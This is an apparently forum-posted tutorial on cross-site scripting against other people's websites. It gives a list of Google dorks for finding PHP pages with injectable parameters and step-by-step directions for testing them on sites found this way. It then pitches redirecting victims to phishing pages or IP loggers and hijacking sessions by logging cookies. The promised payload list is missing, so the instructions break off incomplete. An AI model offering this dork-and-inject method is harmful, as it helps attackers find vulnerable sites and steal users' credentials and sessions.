First of all you're going to have to find a vulnerable site. For this you will need dorks!

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
Post those dorks into Google search engine and click search. A bunch of sites will show up with those pages. (example: www.xxx.com/page.php?=general)
Select one of those sites and remove the very end of the link. (example: general)
Replace it with one of the vulnerabilities below.

If the site is vulnerable you will either receive a popup message, or see a change to the site. This depends on what vulnerability you used.
Note: These changes are NOT permanent. If you change the end of the link it will go back to normal.
So if it just goes back to normal what's the point of XSS?
You can do plenty of things! If the site is vulnerable to a specific XSS like "redirecting". You can give victims what seems to be a harmless link, but once clicked on they are redirected to your malicious website. This could be a phisher or IP logger. Another thing you can do is "session hijacking". You can make it so that the session hijacker logs cookies (can be used to gain usernames, passwords, e-mails and IP's). It is quite a deadly attack for something so simple.
Thanks for reading and I hope you learned a thing or two.
